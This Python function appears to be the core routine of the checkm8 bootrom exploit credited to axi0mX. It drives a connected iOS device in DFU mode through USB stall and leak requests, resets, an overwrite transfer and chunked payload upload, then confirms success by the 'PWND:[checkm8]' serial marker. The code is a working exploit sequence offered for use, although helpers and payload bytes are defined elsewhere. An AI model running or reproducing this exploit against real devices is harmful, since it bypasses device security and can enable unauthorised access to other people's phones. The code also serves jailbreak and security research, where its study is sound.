def exploit() -> None:
    """Run the checkm8 DFU sequence against the first DFU device found.

    The device is located via ``dfu.acquire_device()`` and identified only by
    its USB serial-number string: a serial already containing ``'PWND:['`` is
    treated as "already done" and the function returns early; after the
    sequence the serial must contain ``'PWND:[checkm8]'`` or the process
    exits with status 1.  From a monitoring standpoint that marker in a
    USB serial descriptor is the observable artifact of a device left in
    pwned DFU mode.

    The per-device step counts (``large_leak``, ``hole``, ``leak``) and the
    ``overwrite`` blob come from ``exploit_config()``, defined elsewhere in
    this file; the helpers ``usb_req_stall``/``usb_req_leak``/
    ``usb_req_no_leak``/``stall``/``no_leak`` and the ``libusb1_*`` transfer
    wrappers are likewise defined outside this block.  Statement order and
    the timing values are part of the procedure — do not reorder.

    Returns:
        None.  Progress is reported on stdout.

    Side effects:
        USB control transfers, USB bus resets, a 0.5 s sleep, and
        ``sys.exit(1)`` on failure.
    """
    print('*** checkm8 exploit by axi0mX ***')
    device = dfu.acquire_device()
    start = time.time()
    print('Found:', device.serial_number)
    # Gate solely on the serial string; nothing else about the device is checked here.
    if 'PWND:[' in device.serial_number:
        print( 'Device is already in pwned DFU Mode. Not executing exploit.')
        return
    payload, config = exploit_config(device.serial_number)
    # Two alternative request sequences, selected by whether the config defines large_leak.
    if config.large_leak is not None:
        usb_req_stall(device)
        for i in range(config.large_leak):
            usb_req_leak(device)
        usb_req_no_leak(device)
    else:
        stall(device)
        for i in range(config.hole):
            no_leak(device)
        usb_req_leak(device)
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)
    device = dfu.acquire_device()
    # Bare attribute read with the value discarded; presumably forces a
    # descriptor fetch on the re-acquired handle — TODO confirm against dfu.acquire_device.
    device.serial_number
    # 0x800-byte transfer with a 0.0001 s timeout, followed by a zero-length request 4.
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)
    time.sleep(0.5)
    device = dfu.acquire_device()
    usb_req_stall(device)
    # Same branch selector as above; counts come from the config, not computed here.
    if config.large_leak is not None:
        usb_req_leak(device)
    else:
        for i in range(config.leak):
            usb_req_leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 100)
    # Payload is sent in 0x800-byte chunks; the last chunk may be shorter.
    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i+0x800], 100)
    dfu.usb_reset(device)
    dfu.release_device(device)
    device = dfu.acquire_device()
    # Success is judged only by the new serial string reported after reset.
    if 'PWND:[checkm8]' not in device.serial_number:
        print( 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
        sys.exit(1)
    print( 'Device is now in pwned DFU Mode.')
    print( '(%0.2f seconds)' % (time.time() - start))
    dfu.release_device(device)